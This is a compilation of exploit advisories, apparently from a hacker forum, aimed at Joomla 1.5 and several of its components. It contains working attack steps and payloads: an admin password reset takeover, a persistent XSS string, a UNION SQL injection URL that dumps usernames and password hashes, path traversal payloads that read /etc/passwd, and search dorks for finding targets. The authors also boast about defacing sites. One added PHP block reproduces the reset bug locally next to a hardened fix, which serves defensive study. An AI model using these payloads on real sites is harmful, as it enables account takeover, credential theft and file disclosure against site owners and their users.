Joomla 1.5.x Remote Admin Password Change
Joomla com_socialads Persistent Xss Vulnerability
Joomla com_neorecruit BSqli Vulnerability
Joomla Component com_jcafe local File/Path and Cookie Disclosure Vulnerability
Joomla Component com_newsfeeds SQL injection vulnerability
Joomla Component Picasa2Gallery LFI vulnerability
Joomla Component com_realtyna LFI vulnerability
Joomla JE Ajax event calendar SQL Vulnerable
- Code:
#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################
File : /components/com_user/controller.php
#####################################################################################
Line : 379-399
function confirmreset()
{
    // Check for request forgeries
    JRequest::checkToken() or die( 'Invalid Token' );
    // Get the input
    $token = JRequest::getVar('token', null, 'post', 'alnum'); // <--- {1}
    // Get the model
    $model = &$this->getModel('Reset');
    // Verify the token
    if ($model->confirmReset($token) === false) // <--- {2}
    {
        $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
        $this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
        return false;
    }
    $this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}
#####################################################################################
File : /components/com_user/models/reset.php
Line: 111-130
function confirmReset($token)
{
    global $mainframe;
    $db = &JFactory::getDBO();
    $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); // <--- {3}
    // Verify the token
    if (!($id = $db->loadResult()))
    {
        $this->setError(JText::_('INVALID_TOKEN'));
        return false;
    }
    // Push the token and user id into the session
    $mainframe->setUserState($this->_namespace.'token', $token);
    $mainframe->setUserState($this->_namespace.'id', $id);
    return true;
}
#####################################################################################
{1} - Replace ' with empty char
{3} - If you enter ' in the token field, then the query will look like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
Example :
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
# milw0rm.com [2008-08-12]
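Added example (not part of the advisory and not Joomla's own code): the token check quoted above, reproduced against a constructed in-memory SQLite table, next to a hardened variant that refuses any token that is not exactly 32 alphanumeric characters. The table layout, the sample rows, the `filterAlnum` stand-in for the 'alnum' request filter and the 32-character token length are assumptions.

```php
<?php
// Added illustration, not Joomla source. Schema and rows are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, block INTEGER, activation TEXT)');

// An account with no pending reset carries an empty activation value.
$db->exec("INSERT INTO users VALUES (62, 'admin', 0, '')");
// An account with a pending reset carries a 32-character token (assumed length).
$pending = str_repeat('a1b2c3d4', 4);
$db->exec("INSERT INTO users VALUES (63, 'alice', 0, '$pending')");

// Stand-in for the 'alnum' filter at {1}: every non-alphanumeric character is dropped.
function filterAlnum($value)
{
    return preg_replace('/[^A-Za-z0-9]/', '', (string) $value);
}

// Same decision as confirmReset() at {3}: the first unblocked row whose
// activation equals the submitted token is accepted, even if both are empty.
function confirmResetVulnerable(PDO $db, $token)
{
    $stmt = $db->prepare('SELECT id FROM users WHERE block = 0 AND activation = ? ORDER BY id LIMIT 1');
    $stmt->execute(array($token));
    $id = $stmt->fetchColumn();
    return $id === false ? false : (int) $id;
}

// Hardened variant: a token of the wrong shape never reaches the query, so an
// empty token can no longer match rows that have no reset pending.
function confirmResetHardened(PDO $db, $token)
{
    if (!is_string($token) || !preg_match('/^[A-Za-z0-9]{32}$/', $token)) {
        return false;
    }
    return confirmResetVulnerable($db, $token);
}

// A lone quote becomes the empty string after filtering.
$submitted = filterAlnum("'");
var_dump(confirmResetVulnerable($db, $submitted)); // matches the admin row
var_dump(confirmResetHardened($db, $submitted));   // rejected before the query
var_dump(confirmResetHardened($db, $pending));     // a well-formed pending token still works
```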
Joomla com_socialads Persistent Xss Vulnerability
- Code:
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Joomla com_socialads Persistent Xss Vulnerability
Date : july 3,2010
Critical Level : HIGH
vendor URL :http://techjoomla.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
With SocialAds for JomSocial, you can create Facebook like demographically targeted ads to show on Your JomSocial Site. This extension allows advertisers to create their advertisement , Target the users they want to show the advertisement to, Decide if they want to pay by impressions or per click, Pay online & get the advertisement started up right away !
#######################################################################################################
Xploit : Persistent Xss Vulnerability
Step 1: Register :D
Step 2: Go to the option called "MANAGE YOUR ADS"
Step 3: In the ads description the attacker can post xss scripts
DEMO URL :http://server/js/index.php?option=com_socialads&view=showad&Itemid=94
Attack Pattern :">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
Step 4: Now check your ads :P
DEMO URL :http://server/js/index.php?option=com_socialads&view=adsummary&Itemid=94&adid=23
###############################################################################################################
# 0day no more
# Sid3^effects
Joomla com_neorecruit BSqli Vulnerability
- Code:
Name : Joomla com_neorecruit BSqli Vulnerability
Date : july 6,2010
Critical Level : HIGH
vendor URL :http://www.neojoomla.com
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description :
NeoRecruit is a recruitment component. It enables you to propose job and internship offers. The offers are classified in various categories and are allotted to a recruiter to which you can give access to the management of his offers from the website.
NeoRecruit it is not simply a system which presents offers, it makes it possible to recover the CV and the covering letters of the applicants when apply to an offer. You thus create a true CV database, manageable from the backend or the frontend for recruiters.
You can thus manage these offers for your company or to propose it to your customers or members. They will be able to propose job offers and to manage the applications from their user account.
#######################################################################################################
Xploit :BSQli Vulnerability
DEMO URL :http://server/index.php?option=com_neorecruit&task=offer_view&id=155&Itemid=[Bsqli]
###############################################################################################################
# 0day no more
# Sid3^effects
Joomla Component com_jcafe local File/Path and Cookie Disclosure Vulnerability
- Code:
# Exploit Title: Joomla Component com_jcafe local File/Path and Cookie Disclosure Vulnerability
# Date: 25/06/2010
# Author: r45c4l
# Email: r45c4l[at]hotmail[dot]com
# Site : www.garage4hackers.com
# Vendor url: http://www.joomcafe.com/
# Version: J!Cafe v1.0
# Tested on: Windows
# CVE : ()
:::::::::::::::::::::::::
:::::::::::::::::::::::::
=================Exploit======
---Indian Cyber warriors---
[ EXPL0!T ]
Local File, Path and Cookie Disclosure
p0c - http://www.site.com/index.php?option=com_jcafe&Itemid=53&task=view&prod=../../../../../../
dem0 - http://ver1.5.joomcafe.com/index.php?option=com_jcafe&Itemid=53&task=view&prod=../../../../../../
The error message will also disclose the cookies.
===========================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Sandeep, Th3 RDX,
Vaibhav, All members of ICW and Hackers Garage, and all Indian Hackers
Greetz to: Lucky and Atul and team ICA
PROUD TO BE AN INDIAN
c0d3 for motherland, h4ck for motherland
Joomla Component com_newsfeeds SQL injection vulnerability
- Code:
# Title: Joomla Component com_newsfeeds SQL injection vulnerability
# EDB-ID: 12465
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Archimonde
# Published: 2010-04-30
# Verified: yes
# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 30/04/2010
# Author: Archimonde
# Software Link:
# Version:
# Tested on:
# CVE :
# Code :
Email : archimondera@gmail.com
Website : xgroupvn.org - programmer.vn
Code:
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
Example:
Code:
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Joomla Component Picasa2Gallery LFI vulnerability
- Code:
[~] Joomla Component Picasa2Gallery LFI vulnerability
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 22 june, 2010
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : http://www.masselink.net
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.masselink.net/downloads/Software/Picasa2Gallery-1.2.8/
[+] Version : 1.2.8 or lower ;)
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_picasa2gallery&controller=[INDONESIANCODER]
[ XpL ]
../../../../../../../../../../../../../../../etc/passwd%00
[ d3m0 ]
http://sever/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00
[!]===========================================================================[!]
[ Thx TO ]
[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-
[+] Contrex,YadoY666,bumble_be,MarahMeraH,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212
[ NOTE ]
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] When we are together, sound the danger alarm ;)
[+] Ayy : HappY birthday .. sorry I'm late, haha . . .
[+] MALANG ! we are coming ... ^^
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] nothing secure ..
Joomla Component com_realtyna LFI vulnerability
- Code:
[^] dork : inurl:"joomla"
[!]===========================================================================[!]
[ Vulnerable File ]=-
http://[localhost]/index.php?option=com_realtyna&controller=[FRIBO]
[ XpL ]=-
../../../../../../../../../../../../../../../etc/passwd%00
[!]===========================================================================[!]
[ Thx TO ]=-
[+] Indonesian Hacker Team, Arumbia, IndonesianCoder Team, Kill-9, Yogyacarderlink, ServerIsDown
[+] tukulesto,Kamtiez,xr0b0t si om bagus,arianom,N4CK0,Jundab,bobyhikaru,gonzhack,senot,Jack-
[+] Contrex,YadoY666,bumble_be,MarahMeraH,Suddendeath,r4tu_l364h,IBL13Z,r3m1ck
[+] ELVIN4,Gh4mb4s,vYcOd,ayy,otong,CS-31,yur4kh4,ranggamagic
[+] v3n0m, z0mb13, setanmuda, Jali, Hmei7
[ NOTE ]=-
[+] Mrs.Fribo, please don't stay angry. LoVe u dear :*
[+] eLv1n4 where are you?
[+] papi karma666 and mami winda, congratulations :D
[ Spoiler ]=-
[+] Indonesian Hacker Team Was Here
[+] www.fribo.tv
Joomla JE Ajax event calendar SQL Vulnerable
- Code:
########################################## 1
0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title: Joomla JE Ajax event calendar SQL Vulnerable
Version:1.0.5
Published: 2010-06-23
Greetz to:r0073r, Sid3^effects, MaYur, MA1201, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team
Shoutzz:- To all ICW members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:
100% MVC structure follow. There are three different managers in that component:-
1. Category Management
2. Event Management
3. Event Setting
1. Category Management: - Admin can add, edit, delete, published and unpublished the category title and description.
2. Event Management: - Admin can add, edit, delete, published and unpublished the event. Event title, category, start date, end date, description, background color and text color add, edit and delete, published, unpublished from the event management.
Admin has rights that all users or selected user or none can see the event from front end.
Admin can add event to selected category.
3. Setting: - Admin can enable or disable all the events which user can add the event or not.
Admin can set the header1, header2, header3, header4 color using color picker.
Features:-
- Add event to particular category
- Set the calendar color using color picker.
- Admin has rights to add event from site side.
- Admin has rights that all users see the event or selected user can see the events.
- Front end side user can see the event description in light box by click on that event.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Vulnerability:
*SQL Vulnerability
DEMO URL :
http://server/component/jeeventcalendar/?view=[Sqli]
# 0day n0 m0re #
# L0rd CrusAd3r #